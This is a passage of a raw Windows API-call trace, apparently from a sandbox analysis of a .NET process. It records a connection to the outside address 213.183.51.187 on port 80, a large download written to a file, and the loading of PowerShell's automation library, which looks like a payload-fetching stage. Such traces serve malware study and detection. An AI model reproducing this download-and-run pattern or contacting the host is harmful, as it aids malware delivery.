pSid=0x24060b4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x510ea18) returned 1 [0029.168] GetLastError () returned 0x0 [0029.168] CreateMutexW (lpMutexAttributes=0x24061c4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0029.168] GetLastError () returned 0x0 [0029.168] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0029.168] GetLastError () returned 0x0 [0029.168] ReleaseMutex (hMutex=0x414) returned 1 [0029.168] GetLastError () returned 0x0 [0029.169] CloseHandle (hObject=0x414) returned 1 [0029.169] GetLastError () returned 0x0 [0029.169] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2406920, cbSid=0x510ea18 | out: pSid=0x2406920*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x510ea18) returned 1 [0029.169] GetLastError () returned 0x0 [0029.169] CreateMutexW (lpMutexAttributes=0x2406a30, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0029.169] GetLastError () returned 0x0 [0029.169] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0029.169] GetLastError () returned 0x0 [0029.169] ReleaseMutex (hMutex=0x414) returned 1 [0029.169] GetLastError () returned 0x0 [0029.169] CloseHandle (hObject=0x414) returned 1 [0029.169] GetLastError () returned 0x0 [0029.172] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x414 [0029.172] GetLastError () returned 0x0 [0029.172] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c [0029.172] GetLastError () returned 0x0 [0029.173] ioctlsocket (in: s=0x414, cmd=-2147195266, argp=0x510ec64 | out: argp=0x510ec64) returned 0 [0029.173] GetLastError () returned 0x0 [0029.174] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x420 [0029.174] GetLastError () returned 0x0 [0029.174] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x424 [0029.174] GetLastError () returned 0x0 [0029.174] ioctlsocket (in: s=0x420, cmd=-2147195266, argp=0x510ec64 | out: argp=0x510ec64) returned 0 [0029.174] GetLastError () returned 0x0 [0029.176] WSAIoctl (in: s=0x414, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x510ec48, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x510ec48, lpOverlapped=0x0) returned -1 [0029.176] GetLastError () returned 0x2733 [0029.176] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x325c38, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0029.177] GetLastError () returned 0x2733 [0029.177] WSAEventSelect (s=0x414, hEventObject=0x41c, lNetworkEvents=512) returned 0 [0029.178] GetLastError () returned 0x0 [0029.178] WSAIoctl (in: s=0x420, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x510ec48, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x510ec48, lpOverlapped=0x0) returned -1 [0029.178] GetLastError () returned 0x2733 [0029.178] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x325c38, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0029.178] GetLastError () returned 0x2733 [0029.178] WSAEventSelect (s=0x420, hEventObject=0x424, lNetworkEvents=512) returned 0 [0029.178] GetLastError () returned 0x0 [0029.179] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x428 [0029.179] GetLastError () returned 0x0 [0029.180] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x428, param_3=0x3) returned 0x0 [0029.184] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x510ec2c | out: phkResult=0x510ec2c*=0x440) returned 0x0 [0029.184] GetLastError () returned 0x0 [0029.186] RegOpenKeyExW (in: hKey=0x440, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x510ebe8 | out: phkResult=0x510ebe8*=0x444) returned 0x0 [0029.186] GetLastError () returned 0x0 [0029.186] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x448 [0029.186] GetLastError () returned 0x0 [0029.187] RegNotifyChangeKeyValue (hKey=0x444, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x448, fAsynchronous=1) returned 0x0 [0029.187] GetLastError () returned 0x0 [0029.189] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x510ebe8 | out: phkResult=0x510ebe8*=0x44c) returned 0x0 [0029.189] GetLastError () returned 0x0 [0029.189] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x450 [0029.189] GetLastError () returned 0x0 [0029.189] RegNotifyChangeKeyValue (hKey=0x44c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x450, fAsynchronous=1) returned 0x0 [0029.189] GetLastError () returned 0x0 [0029.189] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x510ebe8 | out: phkResult=0x510ebe8*=0x454) returned 0x0 [0029.189] GetLastError () returned 0x0 [0029.189] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x458 [0029.189] GetLastError () returned 0x0 [0029.189] RegNotifyChangeKeyValue (hKey=0x454, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x458, fAsynchronous=1) returned 0x0 [0029.189] GetLastError () returned 0x0 [0029.189] GetCurrentProcess () returned 0xffffffff [0029.189] GetLastError () returned 0x3f0 [0029.190] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510ebd0 | out: TokenHandle=0x510ebd0*=0x45c) returned 1 [0029.190] GetLastError () returned 0x3f0 [0029.193] GetCurrentProcess () returned 0xffffffff [0029.193] GetLastError () returned 0x3f0 [0029.193] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e7ec | out: TokenHandle=0x510e7ec*=0x460) returned 1 [0029.193] GetLastError () returned 0x3f0 [0029.195] GetCurrentProcess () returned 0xffffffff [0029.195] GetLastError () returned 0x3f0 [0029.195] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e7fc | out: TokenHandle=0x510e7fc*=0x464) returned 1 [0029.195] GetLastError () returned 0x3f0 [0029.206] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x2e8528 | out: pProxyConfig=0x2e8528) returned 1 [0029.296] GetLastError () returned 0x0 [0029.301] SetEvent (hEvent=0x3a8) returned 1 [0029.301] GetLastError () returned 0x0 [0029.319] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x1, ppwstrAutoConfigUrl=0x510eb84 | out: ppwstrAutoConfigUrl=0x510eb84*=0x0) returned 0 [0040.413] GetLastError () returned 0x2f94 [0040.413] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x2, ppwstrAutoConfigUrl=0x510eb84 | out: ppwstrAutoConfigUrl=0x510eb84*=0x0) returned 0 [0043.040] GetLastError () returned 0x2f94 [0043.046] GetCurrentProcess () returned 0xffffffff [0043.046] GetLastError () returned 0x3f0 [0043.046] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e824 | out: TokenHandle=0x510e824*=0x4dc) returned 1 [0043.046] GetLastError () returned 0x3f0 [0043.047] GetCurrentProcess () returned 0xffffffff [0043.047] GetLastError () returned 0x3f0 [0043.047] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e834 | out: TokenHandle=0x510e834*=0x4d4) returned 1 [0043.047] GetLastError () returned 0x3f0 [0043.048] SetEvent (hEvent=0x3a8) returned 1 [0043.048] GetLastError () returned 0x3f0 [0043.051] inet_addr (cp="213.183.51.187") returned 0xbb33b7d5 [0043.051] GetLastError () returned 0x3f0 [0043.052] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e0 [0043.052] GetLastError () returned 0x0 [0043.052] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e4 [0043.052] GetLastError () returned 0x0 [0043.052] ioctlsocket (in: s=0x4e0, cmd=-2147195266, argp=0x510ec04 | out: argp=0x510ec04) returned 0 [0043.052] GetLastError () returned 0x0 [0043.052] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e8 [0043.052] GetLastError () returned 0x0 [0043.052] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4ec [0043.052] GetLastError () returned 0x0 [0043.053] ioctlsocket (in: s=0x4e8, cmd=-2147195266, argp=0x510ec04 | out: argp=0x510ec04) returned 0 [0043.053] GetLastError () returned 0x0 [0043.053] WSAIoctl (in: s=0x4e0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x510ebe8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x510ebe8, lpOverlapped=0x0) returned -1 [0043.053] GetLastError () returned 0x2733 [0043.053] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x325c38, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0043.053] GetLastError () returned 0x2733 [0043.053] WSAEventSelect (s=0x4e0, hEventObject=0x4e4, lNetworkEvents=512) returned 0 [0043.053] GetLastError () returned 0x0 [0043.053] WSAIoctl (in: s=0x4e8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x510ebe8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x510ebe8, lpOverlapped=0x0) returned -1 [0043.053] GetLastError () returned 0x2733 [0043.053] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x325c38, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0043.053] GetLastError () returned 0x2733 [0043.053] WSAEventSelect (s=0x4e8, hEventObject=0x4ec, lNetworkEvents=512) returned 0 [0043.053] GetLastError () returned 0x0 [0043.059] GetAdaptersAddresses () returned 0x6f [0043.064] LocalAlloc (uFlags=0x0, uBytes=0xa44) returned 0x34f218 [0043.064] GetLastError () returned 0x0 [0043.064] GetAdaptersAddresses () returned 0x0 [0043.077] LocalFree (hMem=0x34f218) returned 0x0 [0043.077] GetLastError () returned 0x0 [0043.082] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f0 [0043.082] GetLastError () returned 0x0 [0043.083] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f4 [0043.083] GetLastError () returned 0x0 [0043.084] inet_addr (cp="213.183.51.187") returned 0xbb33b7d5 [0043.084] GetLastError () returned 0x0 [0043.088] WSAConnect (in: s=0x4f0, name=0x240e0ec*(sa_family=2, sin_port=0x50, sin_addr="213.183.51.187"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0043.115] GetLastError () returned 0x0 [0043.117] closesocket (s=0x4f4) returned 0 [0043.117] GetLastError () returned 0x0 [0043.121] send (in: s=0x4f0, buf=0x240f9b4*, len=73, flags=0 | out: buf=0x240f9b4*) returned 73 [0043.121] GetLastError () returned 0x0 [0043.124] setsockopt (s=0x4f0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0043.124] GetLastError () returned 0x0 [0043.124] recv (in: s=0x4f0, buf=0x240cbd0, len=4096, flags=0 | out: buf=0x240cbd0*) returned 4096 [0043.151] GetLastError () returned 0x0 [0043.155] setsockopt (s=0x4f0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0043.155] GetLastError () returned 0x0 [0043.155] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 1712 [0043.155] GetLastError () returned 0x0 [0043.155] WriteFile (in: hFile=0x388, lpBuffer=0x24215d4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x24215d4*, lpNumberOfBytesWritten=0x510ed0c*=0x1000, lpOverlapped=0x0) returned 1 [0043.156] GetLastError () returned 0x0 [0043.156] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 65536 [0043.272] GetLastError () returned 0x0 [0043.272] WriteFile (in: hFile=0x388, lpBuffer=0x24215d4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x24215d4*, lpNumberOfBytesWritten=0x510ed0c*=0x1000, lpOverlapped=0x0) returned 1 [0043.272] GetLastError () returned 0x0 [0043.272] WriteFile (in: hFile=0x388, lpBuffer=0x2411f62*, nNumberOfBytesToWrite=0xf5be, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411f62*, lpNumberOfBytesWritten=0x510ed0c*=0xf5be, lpOverlapped=0x0) returned 1 [0043.274] GetLastError () returned 0x0 [0043.274] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 8516 [0043.274] GetLastError () returned 0x0 [0043.274] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0x2144, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0x2144, lpOverlapped=0x0) returned 1 [0043.275] GetLastError () returned 0x0 [0043.275] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 7260 [0043.275] GetLastError () returned 0x0 [0043.275] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0x1c5c, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0x1c5c, lpOverlapped=0x0) returned 1 [0043.275] GetLastError () returned 0x0 [0043.275] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 49368 [0043.303] GetLastError () returned 0x0 [0043.303] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0xc0d8, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0xc0d8, lpOverlapped=0x0) returned 1 [0043.305] GetLastError () returned 0x0 [0043.305] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 8712 [0043.305] GetLastError () returned 0x0 [0043.305] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0x2208, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0x2208, lpOverlapped=0x0) returned 1 [0043.306] GetLastError () returned 0x0 [0043.306] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 3752 [0043.307] GetLastError () returned 0x0 [0043.307] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 6412 [0043.307] GetLastError () returned 0x0 [0043.307] WriteFile (in: hFile=0x388, lpBuffer=0x24215d4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x24215d4*, lpNumberOfBytesWritten=0x510ed0c*=0x1000, lpOverlapped=0x0) returned 1 [0043.307] GetLastError () returned 0x0 [0043.307] WriteFile (in: hFile=0x388, lpBuffer=0x2411678*, nNumberOfBytesToWrite=0x17b4, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411678*, lpNumberOfBytesWritten=0x510ed0c*=0x17b4, lpOverlapped=0x0) returned 1 [0043.307] GetLastError () returned 0x0 [0043.307] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 2904 [0043.307] GetLastError () returned 0x0 [0043.308] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 65536 [0043.338] GetLastError () returned 0x0 [0043.338] WriteFile (in: hFile=0x388, lpBuffer=0x24215d4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x24215d4*, lpNumberOfBytesWritten=0x510ed0c*=0x1000, lpOverlapped=0x0) returned 1 [0043.338] GetLastError () returned 0x0 [0043.338] WriteFile (in: hFile=0x388, lpBuffer=0x24119c8*, nNumberOfBytesToWrite=0xfb58, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x24119c8*, lpNumberOfBytesWritten=0x510ed0c*=0xfb58, lpOverlapped=0x0) returned 1 [0043.340] GetLastError () returned 0x0 [0043.340] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 7064 [0043.340] GetLastError () returned 0x0 [0043.340] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0x1b98, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0x1b98, lpOverlapped=0x0) returned 1 [0043.340] GetLastError () returned 0x0 [0043.340] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 2904 [0043.340] GetLastError () returned 0x0 [0043.340] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 1452 [0043.341] GetLastError () returned 0x0 [0043.341] WriteFile (in: hFile=0x388, lpBuffer=0x24215d4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x24215d4*, lpNumberOfBytesWritten=0x510ed0c*=0x1000, lpOverlapped=0x0) returned 1 [0043.341] GetLastError () returned 0x0 [0043.341] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 5808 [0043.341] GetLastError () returned 0x0 [0043.341] WriteFile (in: hFile=0x388, lpBuffer=0x24215d4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x24215d4*, lpNumberOfBytesWritten=0x510ed0c*=0x1000, lpOverlapped=0x0) returned 1 [0043.342] GetLastError () returned 0x0 [0043.342] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 21780 [0043.346] GetLastError () returned 0x0 [0043.346] WriteFile (in: hFile=0x388, lpBuffer=0x24215d4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x24215d4*, lpNumberOfBytesWritten=0x510ed0c*=0x1000, lpOverlapped=0x0) returned 1 [0043.346] GetLastError () returned 0x0 [0043.346] WriteFile (in: hFile=0x388, lpBuffer=0x2411d6c*, nNumberOfBytesToWrite=0x4cc8, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411d6c*, lpNumberOfBytesWritten=0x510ed0c*=0x4cc8, lpOverlapped=0x0) returned 1 [0043.348] GetLastError () returned 0x0 [0043.348] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 5808 [0043.348] GetLastError () returned 0x0 [0043.348] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0x16b0, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0x16b0, lpOverlapped=0x0) returned 1 [0043.348] GetLastError () returned 0x0 [0043.348] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 65536 [0043.371] GetLastError () returned 0x0 [0043.371] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0x10000, lpOverlapped=0x0) returned 1 [0043.372] GetLastError () returned 0x0 [0043.372] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 12872 [0043.372] GetLastError () returned 0x0 [0043.372] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0x3248, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0x3248, lpOverlapped=0x0) returned 1 [0043.372] GetLastError () returned 0x0 [0043.372] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 46188 [0043.384] GetLastError () returned 0x0 [0043.385] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0xb46c, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0xb46c, lpOverlapped=0x0) returned 1 [0043.386] GetLastError () returned 0x0 [0043.386] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 13068 [0043.386] GetLastError () returned 0x0 [0043.386] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0x330c, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0x330c, lpOverlapped=0x0) returned 1 [0043.387] GetLastError () returned 0x0 [0043.387] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 2904 [0043.387] GetLastError () returned 0x0 [0043.387] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 1452 [0043.387] GetLastError () returned 0x0 [0043.387] WriteFile (in: hFile=0x388, lpBuffer=0x24215d4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x24215d4*, lpNumberOfBytesWritten=0x510ed0c*=0x1000, lpOverlapped=0x0) returned 1 [0043.387] GetLastError () returned 0x0 [0043.387] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 2904 [0043.387] GetLastError () returned 0x0 [0043.387] recv (in: s=0x4f0, buf=0x2411520, len=65536, flags=0 | out: buf=0x2411520*) returned 65536 [0043.403] GetLastError () returned 0x0 [0043.403] WriteFile (in: hFile=0x388, lpBuffer=0x24215d4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x24215d4*, lpNumberOfBytesWritten=0x510ed0c*=0x1000, lpOverlapped=0x0) returned 1 [0043.404] GetLastError () returned 0x0 [0043.404] WriteFile (in: hFile=0x388, lpBuffer=0x24118c4*, nNumberOfBytesToWrite=0xfc5c, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x24118c4*, lpNumberOfBytesWritten=0x510ed0c*=0xfc5c, lpOverlapped=0x0) returned 1 [0043.405] GetLastError () returned 0x0 [0043.405] recv (in: s=0x4f0, buf=0x2411520, len=52618, flags=0 | out: buf=0x2411520*) returned 17228 [0043.405] GetLastError () returned 0x0 [0043.405] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0x434c, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0x434c, lpOverlapped=0x0) returned 1 [0043.406] GetLastError () returned 0x0 [0043.406] recv (in: s=0x4f0, buf=0x2411520, len=35390, flags=0 | out: buf=0x2411520*) returned 5808 [0043.406] GetLastError () returned 0x0 [0043.406] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0x16b0, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0x16b0, lpOverlapped=0x0) returned 1 [0043.406] GetLastError () returned 0x0 [0043.406] recv (in: s=0x4f0, buf=0x2411520, len=29582, flags=0 | out: buf=0x2411520*) returned 4356 [0043.406] GetLastError () returned 0x0 [0043.406] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0x1104, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0x1104, lpOverlapped=0x0) returned 1 [0043.407] GetLastError () returned 0x0 [0043.407] recv (in: s=0x4f0, buf=0x2411520, len=25226, flags=0 | out: buf=0x2411520*) returned 25226 [0043.430] GetLastError () returned 0x0 [0043.430] SetEvent (hEvent=0x3a8) returned 1 [0043.430] GetLastError () returned 0x0 [0043.430] WriteFile (in: hFile=0x388, lpBuffer=0x2411520*, nNumberOfBytesToWrite=0x628a, lpNumberOfBytesWritten=0x510ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2411520*, lpNumberOfBytesWritten=0x510ed0c*=0x628a, lpOverlapped=0x0) returned 1 [0043.432] GetLastError () returned 0x0 [0043.433] CloseHandle (hObject=0x388) returned 1 [0043.439] GetLastError () returned 0x0 [0043.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510e530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.478] GetLastError () returned 0x0 [0043.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510e4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.478] GetLastError () returned 0x0 [0043.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510e4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.478] GetLastError () returned 0x0 [0043.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510e4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.478] GetLastError () returned 0x0 [0043.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.513] GetLastError () returned 0xcb [0043.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", 